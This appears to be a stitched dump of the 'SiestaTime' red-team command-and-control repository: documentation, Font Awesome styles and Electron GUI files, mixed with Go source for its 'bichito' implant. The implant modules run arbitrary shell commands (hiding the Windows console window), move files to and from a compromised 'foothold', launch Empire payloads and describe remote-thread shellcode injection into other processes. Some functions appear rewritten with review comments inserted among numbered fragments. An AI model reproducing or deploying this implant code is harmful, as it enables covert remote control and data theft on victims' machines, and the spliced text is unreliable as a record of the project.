11 | help: 12 | @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) 13 | 14 | .PHONY: help Makefile 15 | 16 | # Catch-all target: route all unknown targets to Sphinx using the new 17 | # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS). 18 | %: Makefile 19 | @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) -------------------------------------------------------------------------------- /docs/hive/jobslogs.rst: -------------------------------------------------------------------------------- 1 | Jobs,Logs 2 | =========================== 3 | 4 | The Hive tab provides all information about the jobs processed by Hive and the errors raised during Hive's lifespan. 5 | 6 | 7 | 8 | Jobs 9 | -------------------------------------------- 10 | 11 | .. figure:: ../_static/images/hivestatus/jobs.png 12 | :align: center 13 | :figwidth: 600px 14 | :target: ../_static/images/hivestatus/jobs.png 15 | 16 | 17 | Logs 18 | -------------------------------------------------- 19 | 20 | ..
/*
Description: Download File from Foothold --> Linux, Darwin and Windows (the build tag covers all three)
Flow:
	A.Read the file at target PATH and return its contents base64-encoded
*/
// Download reads the file named by target and returns (false, base64 of its
// bytes). On any read error it returns (true, "Error Reading File: " + err).
// target is used verbatim; it is not validated or confined to any directory.
func Download(target string) (bool, string) {
	contents, readErr := ioutil.ReadFile(target)
	if readErr != nil {
		return true, "Error Reading File: " + readErr.Error()
	}
	encoded := base64.StdEncoding.EncodeToString(contents)
	return false, encoded
}
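/*
Description: Write to File --> Linux,Darwin,Windows.
Flow:
	A.Split the command into "<path> <content>" and write content to the file at path
*/
// Write expects commands in the form "<path> <content>". The first space
// separates the path from the content; everything after it (spaces
// included) is written verbatim, replacing any existing file. It returns
// (true, message) on a malformed command or a write error and
// (false, "File Writed") on success — the success string is kept as-is
// because callers may match on it.
//
// The path is used exactly as given; it is not confined to any directory.
func Write(commands string) (bool, string) {
	// SplitN keeps spaces inside the content intact; the original Split
	// rejected any command whose content contained a space.
	arguments := strings.SplitN(commands, " ", 2)
	if len(arguments) != 2 || arguments[0] == "" {
		return true, "Incorrect Number of params"
	}

	// 0666 is masked by the process umask; unless the umask strips them,
	// the file ends up readable by other local users.
	if err := ioutil.WriteFile(arguments[0], []byte(arguments[1]), 0666); err != nil {
		return true, "Error Writing File: " + err.Error()
	}
	return false, "File Writed"
}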
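/*
Description: Inject Empire --> Darwin
Flow:
	A.Hand the Empire one-liner to "/bin/sh -c", wait for it, and return its output
*/
// InjectEmpire runs payload via /bin/sh and returns (true, stderr+stdout)
// when the shell wrote to stderr or did not exit successfully, else
// (false, stdout+stderr).
//
// The original called cmd.Start() and read outbuf/errbuf straight away,
// before the child had finished (or even begun writing): the result was
// typically empty and the reads raced with the child's writes into the
// buffers. Start's own error was also dropped. cmd.Run() waits first, and
// its error now covers both launch failures and non-zero exits.
func InjectEmpire(payload string) (bool, string) {
	var outbuf, errbuf bytes.Buffer
	cmd := exec.Command("/bin/sh", "-c", payload)
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	err := cmd.Run()

	stdout := outbuf.String()
	stderr := errbuf.String()
	if stderr != "" {
		// Kept from the original: any stderr output counts as failure.
		return true, stderr + stdout
	}
	if err != nil {
		// Non-zero exit or failure to launch, with nothing on stderr.
		return true, err.Error() + "\n" + stdout
	}
	return false, stdout + stderr
}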
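/*
Description: Exec --> Linux and Darwin
Flow:
	A.Spawn "/bin/sh -c <commands>", wait for it, and hand back its output
*/
// Exec runs commands through /bin/sh and returns (true, stderr+stdout) when
// the shell wrote anything to stderr or did not exit successfully, else
// (false, stdout+stderr).
//
// Changes against the original: cmd.Run() already waits, so the extra
// cmd.Wait() only produced "exec: Wait was already called" (and that error
// was discarded); and Run's own error was ignored, so a command that failed
// without writing to stderr — or a shell that could not be started at all —
// was reported as success with empty output.
func Exec(commands string) (bool, string) {
	var outbuf, errbuf bytes.Buffer
	cmd := exec.Command("/bin/sh", "-c", commands)
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	err := cmd.Run()

	stdout := outbuf.String()
	stderr := errbuf.String()
	if stderr != "" {
		// Kept from the original: anything on stderr counts as failure,
		// even when the exit status was zero.
		return true, stderr + stdout
	}
	if err != nil {
		// Non-zero exit (or exec failure) with a silent stderr.
		return true, err.Error() + "\n" + stdout
	}
	return false, stdout + stderr
}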
/*
Description: Upload File to Foothold --> Linux,Darwin,Windows.
Flow:
	A.Base64-decode blob and write the bytes to the file at target PATH
*/
// Upload decodes blob (standard base64) and writes the result to target,
// replacing any existing file. It returns (true, "Error b64 decoding blob: "
// + err) when blob is not valid base64, (true, "Error Writing File: " + err)
// when the write fails, and (false, "File Uploaded") on success.
// target is used verbatim; it is not confined to any directory.
func Upload(target string, blob string) (bool, string) {
	contents, decodeErr := base64.StdEncoding.DecodeString(blob)
	if decodeErr != nil {
		return true, "Error b64 decoding blob: " + decodeErr.Error()
	}

	// contents is already a []byte; no conversion needed before writing.
	// 0666 is subject to the process umask.
	if writeErr := ioutil.WriteFile(target, contents, 0666); writeErr != nil {
		return true, "Error Writing File: " + writeErr.Error()
	}
	return false, "File Uploaded"
}
4 | .#{$fa-css-prefix}-border { 5 | padding: .2em .25em .15em; 6 | border: solid .08em $fa-border-color; 7 | border-radius: .1em; 8 | } 9 | 10 | .#{$fa-css-prefix}-pull-left { float: left; } 11 | .#{$fa-css-prefix}-pull-right { float: right; } 12 | 13 | .#{$fa-css-prefix} { 14 | &.#{$fa-css-prefix}-pull-left { margin-right: .3em; } 15 | &.#{$fa-css-prefix}-pull-right { margin-left: .3em; } 16 | } 17 | 18 | /* Deprecated as of 4.4.0 */ 19 | .pull-right { float: right; } 20 | .pull-left { float: left; } 21 | 22 | .#{$fa-css-prefix} { 23 | &.pull-left { margin-right: .3em; } 24 | &.pull-right { margin-left: .3em; } 25 | } 26 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/rotated-flipped.less: -------------------------------------------------------------------------------- 1 | // Rotated & Flipped Icons 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-rotate-90 { .fa-icon-rotate(90deg, 1); } 5 | .@{fa-css-prefix}-rotate-180 { .fa-icon-rotate(180deg, 2); } 6 | .@{fa-css-prefix}-rotate-270 { .fa-icon-rotate(270deg, 3); } 7 | 8 | .@{fa-css-prefix}-flip-horizontal { .fa-icon-flip(-1, 1, 0); } 9 | .@{fa-css-prefix}-flip-vertical { .fa-icon-flip(1, -1, 2); } 10 | 11 | // Hook for IE8-9 12 | // ------------------------- 13 | 14 | :root .@{fa-css-prefix}-rotate-90, 15 | :root .@{fa-css-prefix}-rotate-180, 16 | :root .@{fa-css-prefix}-rotate-270, 17 | :root .@{fa-css-prefix}-flip-horizontal, 18 | :root .@{fa-css-prefix}-flip-vertical { 19 | filter: none; 20 | } 21 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/inject_Empire_windows.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "os/exec" // requirement to execute commands against target system 9 | "bytes" 10 | ) 11 | 12 | /* 13 | Description: 
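/*
Description: Inject Empire --> windows build (see the note below)
Flow:
	A.Run the Empire one-liner with the python interpreter, wait for it, and return its output
*/
// InjectEmpire runs "/usr/bin/python <payload>" and returns
// (true, stderr+stdout) when the interpreter wrote to stderr or did not exit
// successfully, else (false, stdout+stderr).
//
// Fixes against the original:
//   - exec.Command was given "/usr/bin/python " + payload as ONE argv[0],
//     so the OS looked for a binary literally named that and the call could
//     never succeed; program and argument are now passed separately.
//   - cmd.Run() already waits; the extra cmd.Wait() returned
//     "exec: Wait was already called" and was silently dropped.
//   - a failure to launch, or a non-zero exit with nothing on stderr, is now
//     reported instead of being treated as success.
//
// NOTE(review): this file carries the windows build tag but uses a Unix
// interpreter path, and its original description said "Linux" — confirm
// which platform it is meant for. payload is handed to python as a single
// argument; if it is meant as a shell-style command line it must be split
// by the caller.
func InjectEmpire(payload string) (bool, string) {
	var outbuf, errbuf bytes.Buffer
	cmd := exec.Command("/usr/bin/python", payload)
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	err := cmd.Run()

	stdout := outbuf.String()
	stderr := errbuf.String()
	if stderr != "" {
		return true, stderr + stdout
	}
	if err != nil {
		return true, err.Error() + "\n" + stdout
	}
	return false, stdout + stderr
}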
@include fa-icon-flip(-1, 1, 0); } 9 | .#{$fa-css-prefix}-flip-vertical { @include fa-icon-flip(1, -1, 2); } 10 | 11 | // Hook for IE8-9 12 | // ------------------------- 13 | 14 | :root .#{$fa-css-prefix}-rotate-90, 15 | :root .#{$fa-css-prefix}-rotate-180, 16 | :root .#{$fa-css-prefix}-rotate-270, 17 | :root .#{$fa-css-prefix}-flip-horizontal, 18 | :root .#{$fa-css-prefix}-flip-vertical { 19 | filter: none; 20 | } 21 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/readf_trio.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "io/ioutil" 7 | "strings" 8 | ) 9 | 10 | /* 11 | Description: Read Files --> Linux,Darwin and Windows 12 | Flow: 13 | A.Use golang native ioutil library to read target PATH file, return the string content 14 | */ 15 | func Read(commands string) (bool,string){ 16 | 17 | var result string 18 | 19 | arguments := strings.Split(commands," ") 20 | if len(arguments) != 1 { 21 | return true,"Incorrect Number of params" 22 | } 23 | 24 | // Read file to byte slice 25 | data, err := ioutil.ReadFile(arguments[0]) 26 | if err != nil { 27 | return true,"Error Reading File: "+err.Error() 28 | } 29 | 30 | result = string(data) + "\n" 31 | return false,result 32 | } -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/migrate_linuxdarwin.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin 2 | 3 | package biterpreter 4 | 5 | import ( 6 | ) 7 | 8 | /* 9 | Description: Migrate:Remote thread injection --> Windows. Inject a donut generated binary shellcode in the memory of another process and create a new thread. 10 | Flow: 11 | A. Will select the x64/x32 version of "migrate_remote_thread_windows" package 12 | B. 
Decode JSON object, that includes shellcode and PID 13 | C. Prepare C pointers, and call Migrate C++ wrapper 14 | D. C++: 15 | d1. OpenProcess 16 | d2. VirtualAllocEx 17 | d3. WriteProcessMemory 18 | d4. CreateRemoteThread 19 | 20 | E. C++ will return error/success. Error will be from the first windows api error (like cannot access target PID) 21 | 22 | */ 23 | func Migrate(jsonMigrate string) (bool,string){ 24 | 25 | 26 | return false,"Persisted" 27 | } -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/path.less: -------------------------------------------------------------------------------- 1 | /* FONT PATH 2 | * -------------------------- */ 3 | 4 | @font-face { 5 | font-family: 'FontAwesome'; 6 | src: url('@{fa-font-path}/fontawesome-webfont.eot?v=@{fa-version}'); 7 | src: url('@{fa-font-path}/fontawesome-webfont.eot?#iefix&v=@{fa-version}') format('embedded-opentype'), 8 | url('@{fa-font-path}/fontawesome-webfont.woff2?v=@{fa-version}') format('woff2'), 9 | url('@{fa-font-path}/fontawesome-webfont.woff?v=@{fa-version}') format('woff'), 10 | url('@{fa-font-path}/fontawesome-webfont.ttf?v=@{fa-version}') format('truetype'), 11 | url('@{fa-font-path}/fontawesome-webfont.svg?v=@{fa-version}#fontawesomeregular') format('svg'); 12 | // src: url('@{fa-font-path}/FontAwesome.otf') format('opentype'); // used when developing fonts 13 | font-weight: normal; 14 | font-style: normal; 15 | } 16 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_path.scss: -------------------------------------------------------------------------------- 1 | /* FONT PATH 2 | * -------------------------- */ 3 | 4 | @font-face { 5 | font-family: 'FontAwesome'; 6 | src: url('#{$fa-font-path}/fontawesome-webfont.eot?v=#{$fa-version}'); 7 | src: url('#{$fa-font-path}/fontawesome-webfont.eot?#iefix&v=#{$fa-version}') 
format('embedded-opentype'), 8 | url('#{$fa-font-path}/fontawesome-webfont.woff2?v=#{$fa-version}') format('woff2'), 9 | url('#{$fa-font-path}/fontawesome-webfont.woff?v=#{$fa-version}') format('woff'), 10 | url('#{$fa-font-path}/fontawesome-webfont.ttf?v=#{$fa-version}') format('truetype'), 11 | url('#{$fa-font-path}/fontawesome-webfont.svg?v=#{$fa-version}#fontawesomeregular') format('svg'); 12 | // src: url('#{$fa-font-path}/FontAwesome.otf') format('opentype'); // used when developing fonts 13 | font-weight: normal; 14 | font-style: normal; 15 | } 16 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/animated.less: -------------------------------------------------------------------------------- 1 | // Animated Icons 2 | // -------------------------- 3 | 4 | .@{fa-css-prefix}-spin { 5 | -webkit-animation: fa-spin 2s infinite linear; 6 | animation: fa-spin 2s infinite linear; 7 | } 8 | 9 | .@{fa-css-prefix}-pulse { 10 | -webkit-animation: fa-spin 1s infinite steps(8); 11 | animation: fa-spin 1s infinite steps(8); 12 | } 13 | 14 | @-webkit-keyframes fa-spin { 15 | 0% { 16 | -webkit-transform: rotate(0deg); 17 | transform: rotate(0deg); 18 | } 19 | 100% { 20 | -webkit-transform: rotate(359deg); 21 | transform: rotate(359deg); 22 | } 23 | } 24 | 25 | @keyframes fa-spin { 26 | 0% { 27 | -webkit-transform: rotate(0deg); 28 | transform: rotate(0deg); 29 | } 30 | 100% { 31 | -webkit-transform: rotate(359deg); 32 | transform: rotate(359deg); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_animated.scss: -------------------------------------------------------------------------------- 1 | // Spinning Icons 2 | // -------------------------- 3 | 4 | .#{$fa-css-prefix}-spin { 5 | -webkit-animation: fa-spin 2s infinite linear; 6 | animation: fa-spin 2s infinite linear; 7 | } 8 
| 9 | .#{$fa-css-prefix}-pulse { 10 | -webkit-animation: fa-spin 1s infinite steps(8); 11 | animation: fa-spin 1s infinite steps(8); 12 | } 13 | 14 | @-webkit-keyframes fa-spin { 15 | 0% { 16 | -webkit-transform: rotate(0deg); 17 | transform: rotate(0deg); 18 | } 19 | 100% { 20 | -webkit-transform: rotate(359deg); 21 | transform: rotate(359deg); 22 | } 23 | } 24 | 25 | @keyframes fa-spin { 26 | 0% { 27 | -webkit-transform: rotate(0deg); 28 | transform: rotate(0deg); 29 | } 30 | 100% { 31 | -webkit-transform: rotate(359deg); 32 | transform: rotate(359deg); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /docs/make.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | pushd %~dp0 4 | 5 | REM Command file for Sphinx documentation 6 | 7 | if "%SPHINXBUILD%" == "" ( 8 | set SPHINXBUILD=sphinx-build 9 | ) 10 | set SOURCEDIR=. 11 | set BUILDDIR=_build 12 | 13 | if "%1" == "" goto help 14 | 15 | %SPHINXBUILD% >NUL 2>NUL 16 | if errorlevel 9009 ( 17 | echo. 18 | echo.The 'sphinx-build' command was not found. Make sure you have Sphinx 19 | echo.installed, then set the SPHINXBUILD environment variable to point 20 | echo.to the full path of the 'sphinx-build' executable. Alternatively you 21 | echo.may add the Sphinx directory to PATH. 22 | echo. 
23 | echo.If you don't have Sphinx installed, grab it from 24 | echo.http://sphinx-doc.org/ 25 | exit /b 1 26 | ) 27 | 28 | %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% 29 | goto end 30 | 31 | :help 32 | %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% 33 | 34 | :end 35 | popd 36 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/accesschk_linuxdarwin.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "fmt" 7 | "os" 8 | "syscall" 9 | ) 10 | 11 | /* 12 | Description: AccessCheck --> Linux and Darwin 13 | Flow: 14 | A.Use Native golang libraries and sys calls to get key operating System data 15 | */ 16 | func Accesschk(filepath string) (bool,string){ 17 | 18 | var result string 19 | 20 | fileInfo, err := os.Stat(filepath) 21 | if err != nil { 22 | return true,"Error Listing stats of file: "+err.Error() 23 | } 24 | 25 | result = "File name ||| Bytes ||| Permissions ||| UID ||| GUID ||| Last Modified\n" 26 | result = result + fmt.Sprintf("%s ||| %d ||| %s ||| %d ||| %d %s \n",fileInfo.Name(),fileInfo.Size(),fileInfo.Mode(), 27 | fileInfo.Sys().(*syscall.Stat_t).Uid,fileInfo.Sys().(*syscall.Stat_t).Gid,fileInfo.ModTime()) 28 | 29 | return false,result 30 | } -------------------------------------------------------------------------------- /docs/resources/vpc.rst: -------------------------------------------------------------------------------- 1 | Virtual Private Cloud 2 | =========================== 3 | 4 | This tab will be used to handle VPC instances that you can save for their late use in deployment of resources. 
5 | 6 | 7 | ``VPS --> Add VPS`` 8 | 9 | 10 | AWS 11 | ----------- 12 | 13 | * Inputs 14 | * VPS Name: Resource Name 15 | * VPS Type: ec2 instance type 16 | * Access Key: 17 | * Secret Key: 18 | * Region: `region`_ 19 | * AMI: `ami`_ 20 | * SSH Keyname: EC2 keyname 21 | * SSH Key: EC2 pem key string 22 | 23 | .. figure:: ../_static/images/addresources/addec2vpc.png 24 | :align: center 25 | :figwidth: 600px 26 | :target: ../_static/images/addresources/addec2vpc.png 27 | 28 | Azure 29 | --------------- 30 | 31 | TBD 32 | 33 | 34 | .. _ami: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/finding-an-ami.html 35 | .. _region: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html 36 | 37 | 38 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/exec_windows.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "os/exec" // requirement to execute commands against target system 9 | "syscall" // required to interact with windows OS calls 10 | "bytes" 11 | ) 12 | 13 | /* 14 | Description: Exec --> Windows 15 | Flow: 16 | A.Spawn a cmd process, and interprete the provided string 17 | B.Set the spawn as HideWindow, so the cmd box doesn't appear when spawning cmd 18 | */ 19 | func Exec(commands string) (bool,string){ 20 | 21 | var outbuf,errbuf bytes.Buffer 22 | cmd_path := "C:\\Windows\\System32\\cmd.exe" 23 | cmd := exec.Command(cmd_path, "/c", commands+"\n") 24 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 25 | cmd.Stdout = &outbuf 26 | cmd.Stderr = &errbuf 27 | cmd.Run() 28 | cmd.Wait() 29 | if errbuf.String() != ""{ 30 | return true,errbuf.String()+outbuf.String() 31 | } 32 | 33 | return false,outbuf.String()+errbuf.String() 34 | } -------------------------------------------------------------------------------- /docs/reporting/basicreport.rst: 
-------------------------------------------------------------------------------- 1 | Basic Reports 2 | =========================== 3 | 4 | 5 | For the moment is just a plain text document, but in the future a more elaborated report will be developed. 6 | 7 | * The reports will have the following strings: 8 | * Report Name 9 | * Report Creation Time 10 | * Every Job Processed by Hive 11 | * Every Job sent to bichitos 12 | * Every command processed through post-exploitation servers (Interactive Sessions per user and time, with their outputs) 13 | 14 | Create Report 15 | -------------------------------------------- 16 | 17 | ``Basic Reports --> Create Report`` 18 | 19 | .. figure:: ../_static/images/reporting/createreport.png 20 | :align: center 21 | :figwidth: 600px 22 | :target: ../_static/images/reporting/createreport.png 23 | 24 | List Reports,Download 25 | -------------------------------------------------- 26 | 27 | Once the report is created it can be downloaded from hive. They will be automatically placed in: ``SiestaTime/installConfig/reports`` -------------------------------------------------------------------------------- /src/client/electronGUI/components/report/report.js: -------------------------------------------------------------------------------- 1 | 2 | $(document).ready(function() { 3 | 4 | 5 | //Determine if elog is for hive,red or bichito, then load the logs for each case 6 | var name = $(".STmain").attr("id"); 7 | 8 | $(".element").text(htmlencode.htmlEncode(name)) 9 | $(".element").attr("value",htmlencode.htmlEncode(name)); 10 | 11 | }) 12 | 13 | /* Craft a Job with the following JSON Object towards client: 14 | 15 | type ReportObject struct { 16 | Name string `json:"name"` 17 | } 18 | */ 19 | 20 | $("#submitdownloadreport").on('click',function() { 21 | 22 | var reportName = $(".element").attr("value"); 23 | 24 | //Create Job to send with two elements 25 | var data = {name:reportName}; 26 | 27 | $.ajax({ 28 | type: "POST", 29 | url: 
"http://127.0.0.1:8000/report", 30 | data: JSON.stringify(data), 31 | contentType: "application/json; charset=utf-8", 32 | dataType: "json", 33 | success: function (response){ 34 | 35 | } 36 | 37 | }); 38 | 39 | }); -------------------------------------------------------------------------------- /src/client/electronGUI/components/logs/logs.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 |
6 |
7 |
8 |

Logs

9 |
10 |
11 |
12 |
13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 |
TimeError
23 |
24 |
25 |
26 |
27 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/migrate_remote_thread_windows.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "bichito/modules/biterpreter/migrate_remote_thread_windows" 7 | ) 8 | 9 | /* 10 | Description: Migrate:Remote thread injection --> Windows. Inject a donut generated binary shellcode in the memory of another process and create a new thread. 11 | Flow: 12 | A. Will select the x64/x32 version of "migrate_remote_thread_windows" package 13 | B. Decode JSON object, that includes shellcode and PID 14 | C. Prepare C pointers, and call Migrate C++ wrapper 15 | D. C++: 16 | d1. OpenProcess 17 | d2. VirtualAllocEx 18 | d3. WriteProcessMemory 19 | d4. CreateRemoteThread 20 | 21 | E. C++ will return error/success. Error will be from the first windows api error (like cannot access target PID) 22 | 23 | */ 24 | func Migrate(jsonMigrate string) (bool,string){ 25 | 26 | err,result := migrate_remote_thread_windows.Migrate(jsonMigrate) 27 | if err != false { 28 | return true,result 29 | } 30 | 31 | return false,result 32 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/createforms/createReport.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Generate Report

6 |
7 |
8 |
9 | 10 |
11 | 12 |
13 | 14 | 15 |
16 | 17 | 18 |
19 | 20 |
21 |
22 |
23 |
24 | 25 | -------------------------------------------------------------------------------- /installConfig/implant_dependencies.txt: -------------------------------------------------------------------------------- 1 | /////STime Implant Dependencies//// 2 | 3 | To install Hive, "installFolder" will need: 4 | 5 | MacOSX10.13.sdk.tar 6 | windependencies.zip 7 | 8 | 9 | For A, Follow instructions on: https://github.com/tpoechtrager/osxcross 10 | 11 | For B, windependencies.zip needs within: 12 | 13 | includes/ 14 | taskschd.h 15 | libs/ 16 | x86/ 17 | comsupp.lib 18 | x64/ 19 | comsupp.lib 20 | 21 | How to Get Needed Dependencies? 22 | Windows 10 + MVS --> "C++ Concole apps Development" 23 | Look target Folders for required libraries 24 | 25 | Module Persistence: schtasks 26 | 27 | Includes 28 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\taskschd.h 29 | Libs 30 | x86 31 | C:\Program Files\Windows Kits\10\Lib\10.0.18362.0\um\x86\taskschd.lib 32 | C:\Program Files\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.23.28105\lib\x86\comsupp.lib 33 | 34 | x64 35 | C:\Program Files\Windows Kits\10\Lib\10.0.18362.0\um\x64\taskschd.lib 36 | C:\Program Files\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.23.28105\lib\x64\comsupp.lib 37 | 38 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/report/report.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Report

6 | 12 |
13 |
14 |
15 | 16 |
17 |
18 | 19 |
20 | 21 |
22 |
23 |
24 |
25 |
26 | 27 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/header/header.js: -------------------------------------------------------------------------------- 1 | //Load data on the header in every refresh of the component 2 | $(document).ready(function() { 3 | 4 | var binumber = 0; 5 | for (i = 0; i < bichitos.length; i++){ 6 | if (bichitos[i].status == "Online"){ 7 | binumber++; 8 | } 9 | } 10 | 11 | var rednumber = 0; 12 | for (i = 0; i < redirectors.length; i++){ 13 | rednumber++; 14 | } 15 | 16 | var inumber = 0; 17 | for (i = 0; i < implants.length; i++){ 18 | inumber++; 19 | } 20 | 21 | var vnumber = 0; 22 | for (i = 0; i < vps.length; i++){ 23 | vnumber++; 24 | } 25 | 26 | var dnumber = 0; 27 | for (i = 0; i < domains.length; i++){ 28 | dnumber++; 29 | 30 | } 31 | 32 | var snumber = 0; 33 | for (i = 0; i < stagings.length; i++){ 34 | snumber++; 35 | } 36 | 37 | $("#himplants").text(inumber); 38 | $("#hbichitos").text(binumber); 39 | $("#hdomains").text(dnumber); 40 | $("#hvps").text(vnumber); 41 | $("#hredirectors").text(rednumber); 42 | $("#hstagings").text(snumber); 43 | $("#username").text("Logged as "+ htmlencode.htmlEncode(username.username)); 44 | 45 | }) 46 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/ls_trio.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "io/ioutil" 7 | "strings" 8 | ) 9 | 10 | /* 11 | Description: List Files --> Linux,Darwin and Windows 12 | Flow: 13 | A.Use golang native ioutil library to list target PATH folder files 14 | */ 15 | func List(commands string) (bool,string){ 16 | 17 | var result string 18 | 19 | arguments := strings.Split(commands," ") 20 | if len(arguments) != 1 { 21 | return true,"Incorrect Number of params" 22 | } 23 | 24 | var dirs,files []string 25 | 
elements, err := ioutil.ReadDir(arguments[0]) 26 | if err != nil { 27 | return true,"Error reading folder:"+err.Error() 28 | } 29 | 30 | for _, element := range elements { 31 | if element.IsDir() { 32 | dirs = append(dirs,element.Name()) 33 | }else{ 34 | files = append(files,element.Name()) 35 | } 36 | } 37 | 38 | result = "---------------Directories-----------\n" 39 | for _, dir := range dirs{ 40 | result = result + dir +"\n" 41 | } 42 | 43 | result = result + "---------------Files-----------------\n" 44 | for _, file := range files{ 45 | result = result + file + "\n" 46 | } 47 | 48 | return false,result 49 | } 50 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/jobs/jobs.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 |
7 |
8 |
9 |

Jobs

10 |
11 |
12 |
13 |

14 | Click Job to Show Results 15 |

16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 |
CidJidTimeJobStatus
30 |
31 |
32 |
33 |
34 | 35 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/createforms/createOperator.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Add Operator

6 |
7 |
8 |
9 | 10 |
11 | 12 |
13 | 14 | 15 |
16 |
17 | 18 | 19 |
20 | 21 | 22 |
23 | 24 |
25 |
26 |
27 |
28 | 29 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/createforms/createVPS.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Add VPS

6 |
7 |
8 |
9 | 10 |
11 | 12 |
13 | 14 | 15 |
16 | 17 | 18 | 22 |
23 | 24 |
25 | 26 |
27 |
28 |
29 |
30 | 31 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/accesschk_windows.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "fmt" 7 | "os" 8 | "github.com/hectane/go-acl/api" 9 | "golang.org/x/sys/windows" 10 | ) 11 | 12 | /* 13 | Description: AccessCheck --> Windows 14 | Flow: 15 | A.Use Native golang windows sys calls and go-acl libraries and to get key operating System data 16 | */ 17 | func Accesschk(filepath string) (bool,string){ 18 | 19 | var result string 20 | 21 | var ( 22 | owner *windows.SID 23 | secDesc windows.Handle 24 | ) 25 | 26 | fileInfo, err := os.Stat(filepath) 27 | if err != nil { 28 | return true,"Error Listing stats of file: "+err.Error() 29 | } 30 | 31 | err = api.GetNamedSecurityInfo( 32 | filepath, 33 | api.SE_FILE_OBJECT, 34 | api.OWNER_SECURITY_INFORMATION, 35 | &owner, 36 | nil, 37 | nil, 38 | nil, 39 | &secDesc, 40 | ) 41 | 42 | if err != nil { 43 | return true,"Error Api call GetNamedSecurityInfo: "+err.Error() 44 | } 45 | defer windows.LocalFree(secDesc) 46 | 47 | result = "File name ||| Bytes ||| Permissions ||| SID ||| Last Modified\n" 48 | result = result + fmt.Sprintf("%s ||| %d ||| %s ||| %s ||| %s \n",fileInfo.Name(),fileInfo.Size(),fileInfo.Mode(),owner,fileInfo.ModTime()) 49 | 50 | return false,result 51 | 52 | } 53 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/createforms/createDomain.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Add Domain

6 |
7 |
8 |
9 | 10 |
11 | 12 |
13 | 14 | 15 |
16 |
17 | 18 |
19 | 20 | 24 | 25 |
26 |
27 | 28 |
29 |
30 |
31 |
